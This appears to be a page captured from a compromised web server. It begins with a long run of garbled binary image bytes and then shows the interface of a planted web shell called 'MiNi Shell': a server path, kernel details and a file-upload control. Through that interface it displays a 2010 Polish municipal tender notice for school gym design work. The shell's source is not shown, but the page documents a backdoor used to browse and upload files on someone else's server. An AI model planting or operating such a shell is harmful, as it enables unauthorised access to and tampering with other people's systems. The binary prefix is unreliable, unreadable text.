JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100126/21940-N-2010.html

<p class="kh_header"><b>Krościenko nad Dunajcem: Wykonanie i dostarczenie dokumentacji projektowo-kosztorysowej na rozbudowę Szkoły Podstawowej o salę gimnastyczną w Krośnicy wraz z przebudową infrastruktury technicznej.</b><br>
<b>Numer ogłoszenia: 21940 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , ul. Rynek 35, 34-450 Krościenko nad Dunajcem, woj. małopolskie, tel. 0182623077 wew. 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kroscienko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostarczenie dokumentacji projektowo-kosztorysowej na rozbudowę Szkoły Podstawowej o salę gimnastyczną w Krośnicy wraz z przebudową infrastruktury technicznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wykonanie i dostarczenie dokumentacji projektowo-kosztorysowej na rozbudowę Szkoły Podstawowej o salę gimnastyczną w Krośnicy wraz z przebudową linii energetycznej i oświetleniowej, przebudową linii telekomunikacyjnej, przebudową linii sanitarnej, regulacją odcinka potoku Krośnica oraz wykonaniem zabezpieczenia p.pożarowego - hydrant i przebudową mostu łączącego teren szkoły z drogą publiczną - niezbędnego do uzyskania pozwolenia na budowę w Starostwie Powiatowym w Nowym Targu
Proponowana lokalizacja  budynku została przedstawiona na załączonej  mapie syt -wys w skali 1:500.
2.Program  użytkowy sali 
1/Budynek jednokondygnacyjny z ew. podpiwniczeniem na kotłownię
2/Sala z boiskiem  do piłki ręcznej  o wym. 12x24 mb z alternatywnym wykorzystaniem płyty sali  na  boisko  do siatkówki  o wym 9 x 18  oraz koszykówki .
3/Pomieszczenia pomocnicze to : magazyn sprzętu sportowego , pokój dla nauczyciela  sanitariaty  , pomieszczenie porządkowe , ew. kotłownia w podpiwniczeniu . 
Należy zaplanować komunikacyjne połączenie sali z budynkiem szkoły.
3.Opracowanie projektowe ma zawierać następujące opracowania:
1/część architektoniczna 
2/część konstrukcyjna
3/projekt technologiczny wyposażenia sali gimnastycznej 
4/instalacja elektryczna 
5/instalacja wodno-kanalizacyjna
6/instalacja CO zapewniająca   dostawę ciepła do części istniejącej szkoły i nowej sali .( przebudowa istn. kotłowni w budynku szkoły lub  budowa  nowej kotłowni w podpiwniczeniu  dla potrzeb szkoły i sali )
7/instalacja wentylacji sali
8/przebudowa sieci energetycznej i oświetlenia  na warunkach zarządcy sieci  ENION SA Kraków
9/przebudowa sieci teletechnicznej  na warunkach TP SA
10/przebudowa sieci kanalizacyjnej  na warunkach PPK Sp. z o.o. w Nowym Targu
11/przyłącz kanalizacyjny 
12/przyłącz wodociągowy 
13/odprowadzenie wód opadowych z budynku i terenu przyszkolnego 
14/zagospodarowanie terenu działki 
15/obustronne zabezpieczenie brzegów potoku Krośnica na odcinku przylegającym do działki inwestora zgodnie z warunkami RZGW Kraków - Zarząd Zlewni Górnego Dunajca z siedzibą w Nowym Targu
16/przebudowa  mostu dojazdowego do terenu szkoły na potoku Krośnica - zgodnie z warunkami RZGW Kraków - Zarząd Zlewni Górnego Dunajca z siedzibą w Nowym Targu
17/specyfikacje techniczną odbioru i wykonania robót budowlanych (w wersji drukowanej i elektronicznej)
18/kosztorysy inwestorskie i ślepe budowy sali  z podziałem na branże oraz z możliwością etapowania inwestycji z podziałem na stan zerowy, stanu surowy otwarty oraz stanu wykończeniowego
19/kosztorysy inwestorskie i ślepe oddzielnie na przebudowę poszczególnych instalacji kolidujących z budową sali tj: elektryczną, teletechniczną, kanalizacji sanitarnej, zabezpieczenia brzegów potoku, przebudowę mostu
4.Wstępne opracowanie  projektowe należy uzgodnić z Zamawiającym oraz innymi jednostkami uzgadniającymi wynikającymi z zakresu opracowania projektowego . 
5.Całość opracowania należy wykonać w wersji drukowanej w il. 5 kpl oraz w formie elektronicznej 
6.Opracować wizualizację  obiektu w rzeczywistym otoczeniu  na planszy o wym.  100 x 70 cm - 3 szt. (oraz wizualizację w wersji elektronicznej)
7.Opracowana dokumentacja powinna być zgodna z obowiązującymi przepisami, w tym:
1/Prawem budowlanym (tekst jednolity: Dz. U. 2006 r. Nr 156, poz. 1118 z późn. zm.),
2/Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego ( Dz U. Nr 202 poz.2072 ze zmianami ),.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych tj:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2) posiadają niezbędna wiedze i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych

Ocena spełnienia powyższych warunków będzie dokonywana metoda spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.
Opis sposobu dokonywania oceny spełnienia warunków:
Wiedza i doświadczenie:
Warunek zostanie uznany za spełniony ,jeżeli wykonawca wykaże , że w ciągu ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie świadczył co najmniej 2 dokumentacje projektowo -kosztorysowe o zakresie odpowiadającym swoim rodzajem i wartością usługom
stanowiącym przedmiot zamówienia, tj. wykonaniem dokumentacji projektowo -kosztorysowej budowie, przebudowie lub rozbudowie budynku o kubaturze większej od 1000 m3 i wartości nie mniejszej niż 50 000 PLN każda ,
(Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia). )
Dysponowanie osobami zdolnymi do wykonania zamówienia
Warunek zostanie uznany za spełniony ,jeżeli wykonawca wykaże ,że będzie dysponował co najmniej 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji w budownictwie dla osób, posiadających uprawnienia budowlane w specjalności architektonicznej bez ograniczeń lub odpowiednie wydane na podstawie wcześniejszych przepisów, które będą wykonywać dokumentacje projektową łącznie z zaświadczeniami o
wpisie na listę samorządu zawodowego, dla autora projektu budowlanego i sprawdzającego, Wykonawca ma wykazać ,że zapewni do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności konstrukcyjno - budowlanej i instalacyjnej w zakresie instalacji i urządzeń cieplnych, wod.- kan. i instalacji i urządzeń elektrycznych, lub odpowiadające im wydane na podstawie
wcześniejszych przepisów łącznie z aktualnym zaświadczeniami o wpisie na listę samorządu
zawodowego.
( Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od
charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na okres korzystania z nich przy wykonywaniu zamówienia. )

Dysponowanie odpowiednim potencjałem technicznym
Warunek zostanie uznany za spełniony ,jeżeli wykonawca załączy do druku oferty stosowne oświadczenie
Potencjał finansowo- ekonomiczny
Warunek zostanie uznany za spełniony ,jeżeli wykonawca załączy do druku oferty stosowne oświadczenie
Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt. 2 ustawy, wystawionego nie wcześniej niź 6 miesięcy przed upływem terminu składania ofert , a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt.2 ustawy w.g załącznika nr 3 do niniejszej siwz.
2. Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiący załącznik nr 3 do niniejszej siwz,
3. Podpisane oświadczenie o ustanowieniu pełnomocnika (jeżeli występuje) w.g załącznika nr 3a do siwz
4. Na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć do oferty wykaz usług 
(należy wypełnić załącznik nr 5 do niniejszej siwz) wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie z którego będzie wynikać, że wykonawca wykonał co najmniej 2 usługi o zakresie odpowiadającym swoim rodzajem usługom objętym zamówieniem, tj. wykonał co najmniej 2 dokumentacje projektowo - kosztorysowe budowy, przebudowy lub rozbudowy budynku o kubaturze większej od 1000 m3 i wartości nie mniejszej niż 50 000 PLN każda ,
Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie usługi zostały wykonane należycie.
5.Wypełniony druk oferty stanowiący załącznik nr 1 i 2 do niniejszej siwz (wykonawca może założyć ofertę na własnym formularzu, lecz jego treść i układ muszą być zgodne z formularzem załączonym do siwz).
6. Na potwierdzenie dysponowania osobami zdolnymi do wykonania zamówienia , wykonawca ma do oferty załączyć wykaz osób( wypełnić załącznik nr 4 do niniejszej siwz) które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie dysponowania tymi osobami.
Z wykazu lub pisemnego zobowiązania innego podmiotu musi wynikać , że wykonawca dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji w budownictwie dla osób, posiadających uprawnienia budowlane w specjalności architektonicznej bez ograniczeń lub odpowiednie wydane na podstawie wcześniejszych przepisów, które będą wykonywać dokumentacje projektową
łącznie z zaświadczeniami o wpisie na listę samorządu zawodowego, dla autora projektu budowlanego i sprawdzającego,
Wykonawca ma wykazać ,że zapewni do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności konstrukcyjno - budowlanej i instalacyjnej w zakresie instalacji i urządzeń cieplnych, wod.- kan. i instalacji i urządzeń elektrycznych, lub odpowiadające im wydane na podstawie wcześniejszych przepisów łącznie z aktualnym zaświadczeniami o wpisie na listę samorządu zawodowego.
Do niniejszego wykazu należy załączyć oświadczenie, że osoby , które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień

Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składa dokumenty zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 poz. 1817).
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1 niniejszej specyfikacji, składa dokument wystawiony w kraju , w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: - nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa w pkt XIVppkt.1 , zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym musza być złożone wraz z tłumaczeniem na język polski.
Forma składania wymaganych dokumentów .
1.Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. .
2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 poz.1817 ) kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
3.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
4. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
UWAGA!
Zamawiający informuje, iż zgodnie z art.96 ust. 3 w zw. z art. 8 ust. 3 ustawy Prawo zamówień publicznych wszystkie oferty składane w postępowaniu są jawne od chwili ich otwarcia, za wyjątkiem informacji stanowiącej tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niżw terminie składania ofert, zastrzegł, że nie mogą one być udostępnione.
// Zgodnie z art.11 ust.4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji ( Dz. U. z 2003 r. Nr 153 poz. 1503 z późn. zm.- Tajemnica przedsiębiorstwa - rozumie się przez to nie ujawnione do wiadomości publicznej informacje techniczne, technologiczne, handlowe lub organizacyjne przedsiębiorstwa, co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności. //
Wykonawca, który chce skorzystać z tego uprawnienia winien złożyć na formularzu ofertowym stosowne zastrzeżenie informujące o tym, że w jego ofercie w odrębnej nieprzejrzystej oprawie/kopercie znajdują się strony oferty, które podlegają klauzuli poufności z uwagi na tajemnicę przedsiębiorstwa.
Brak takiego zastrzeżenia spowoduje, że cała oferta może zostać ogólnie udostępniona.
Wykonawca nie może zastrzec informacji takich jak: jego nazwa (firma) oraz adres, a także informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofertach.

Oferta składana przez więcej niż jednego wykonawcę:
1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2. Dopuszcza się możliwość złożenia jednej oferty przez dwóch lub więcej wykonawców pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) wykonawcy, składający ofertę wspólnie, ponoszą solidarna odpowiedzialność za wykonanie umowy.
2) w odniesieniu do wymagań postawionych przez zamawiającego, każdy z wykonawców oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2 i spełniają wymogi art.22 ust.1 ustawy.
Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie, wykonawcy występujący wspólnie ustanawiają zgodnie z art. 23 ust.2 pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Odpowiednie oświadczenie zawierające imię i nazwisko pełnomocnika należy załączyć do oferty. Oświadczenie ma być podpisane przez wszystkich wykonawców.
Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z wykonawca występującym jako pełnomocnik pozostałych ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Kroscienko+n_Dunajcem.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego:- Urząd Gminy Krościenko n.Dunajcem, Rynek 35, 34-450 Krościenko n.D, pok. nr 4 w godzinach urzędowania.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 09:00, miejsce: siedziba zamawiającego - Urząd Gminy Krościenko n.Dunajcem, Rynek 35, 34-450 Krościenko n.D, SEKRETARIAT..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W oparciu o art.144 ust.1 ustawy Pzp zamawiający informuje, że:
1.Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego specjalistę. Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
1.1.śmierci, choroby lub innych zdarzeń losowych kluczowego specjalisty,
1.2.nie wywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy,
1.3.jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.).
2.Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
3.W przypadku zmiany kluczowego specjalisty, nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
4.Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem zamawiającego w terminie wskazanym we wniosku zamawiającego

Creat By MiNi SheLL
Email: jattceo@gmail.com